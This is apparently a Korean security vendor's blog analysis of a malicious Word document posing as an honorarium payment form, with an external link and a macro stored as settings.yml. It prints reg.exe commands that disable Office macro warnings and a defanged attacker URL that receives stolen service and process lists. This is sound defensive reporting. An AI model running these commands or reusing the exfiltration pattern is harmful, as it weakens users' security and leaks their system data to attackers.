사례비 의뢰서 위장 악성 워드 (External 연결 + VBA 매크로)

문서형 악성코드가 유행이라고 해도 과언이 아닐 만큼 다양한 형태의 악성 문서(HWP, WORD, EXCEL, PDF 등)들이 유포되고있어, ASEC 분석팀에서도 그간 해당 블로그에 다수 관련 내용을 제공해왔다. 그리고 이번에도 새로운 형태의 악성 워드(WORD)문서가 확인되어 이에 대해 알리려한다.

‘사례비지급 의뢰서’로 위장한 악성 워드 형태이며 기존과 조금 다른 점은 악성 External 연결과 VBA 매크로를 동시에 사용했다는 것이다. 앞서 블로그에 소개된 ‘대북관련 본문내용의 악성 워드 문서’들도 단일 파일로는 External 악성 URL 연결만을 수행하였으며 해당 URL에 연결된 곳에서 새로운 문서(매크로)가 연결되어야 동작 할 수 있는 케이스였다.

  • External 내용과 ‘대북관련 본문 내용의 악성 WORD’를 설명한 기존 블로그


[그림1] – 문서 내용

External 연결과 VBA매크로를 한 문서에 담아 ‘사례비지급 의뢰서’로 위장한 이번 악성 워드는 아래와 같은 기능을 수행한다.

[그림2] – document.xml.rels 내용

위 [그림2] 문서 내부 document.xml.rels 내용에 보이는 것과 같이 External로 명시된 악성 URL로 접속을 시도하며, 문서 내부 settings.yml에 구성되어 있는 악성 VBA 매크로를 동작한다.

  • External 악성 URL : hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
  • VBA 매크로 코드가 담긴 파일명 : settings.yml

보통 기본적으로 워드 내부에 VBA 매크로를 제작하면 ‘vbaProject.bin’이라는 명으로 파일이 생성되나 이번 악성 워드에서는 의도적으로 ‘settings.yml’명으로 제작하였을 것으로 보인다.

[그림3] – 매크로 저장 명

해당 문서는 사용자가 문서내부에 사례비 지급을 위한 인적 사항와 계좌 내용을 작성하도록 제작되었는데 악성 행위 발현을 유도하기위해 의도적으로 이렇게 만들었을 것으로 보인다. 작성된 악성 VBA 매크로는 특정 키보드가 입력되었을 시 발현될 수 있기 때문이다.

매크로가 발현되면 아래와 같은 기능을 수행한다.

  1. 매크로가 항상 실행 될 수 있도록 오피스 보안설정을 수정한다.(레지스트리 값 변경)

다수의 버전에서 모두 설정이 변경될 수 있도록 10-19까지의 버전에 대해 레지스트리 값을 변경한다. ‘VBAWarnings’ 값이 ‘1’로 세팅될 경우 워드에서 내부 매크로를 항상 포함하도록 한다.

reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\13.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\17.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\18.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
reg.exe add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\19.0\Word\Security\ /v VBAWarnings /t reg_dword /d 1 /f
[표1] – 레지스트리 변경 명령

2. 악성 URL 접속 시 실행중인 서비스명 실행중인 프로세스 포함하여 전송(유출)한다.

  • 매크로 접속 악성 URL : hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=
  • 실행중인 서비스 명들과 프로세스 명들을 추출하여 위 URL 뒤에 붙여 접속 시도 (URL/서비스명/프로세스명)
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=aelookupsvc appinfo eventsystem fdrespub fontcache gpsvc iphlpsvc lanmanserver lanmanworkstation lmhosts …(중략)… smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe…(중략)…. conhost.exe reg.exe conhost.exe
[표2] – 악성 URL 접속 예시

현재는 External 접속 URL 이후 추가 받아지는 데이터는 없어 위와 같이 정보 유출만을 수행 중이다. C2가 연결된 환경에서 공격자의 의도에 따라 추가 파일을 다운로드 할 것으로 예측된다.

해당 파일은 자사 제품에서 아래와 같이 탐지 중이다.

[파일 진단]
Downloader/DOC.Generic

[IOC 정보]
hxxp://ftcpark59.getenjoyment.net/1703/blank.php?v=sakim
hxxp://ftcpark59.getenjoyment.net/1703/v.php?w=sakim&v=

3.4 5 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments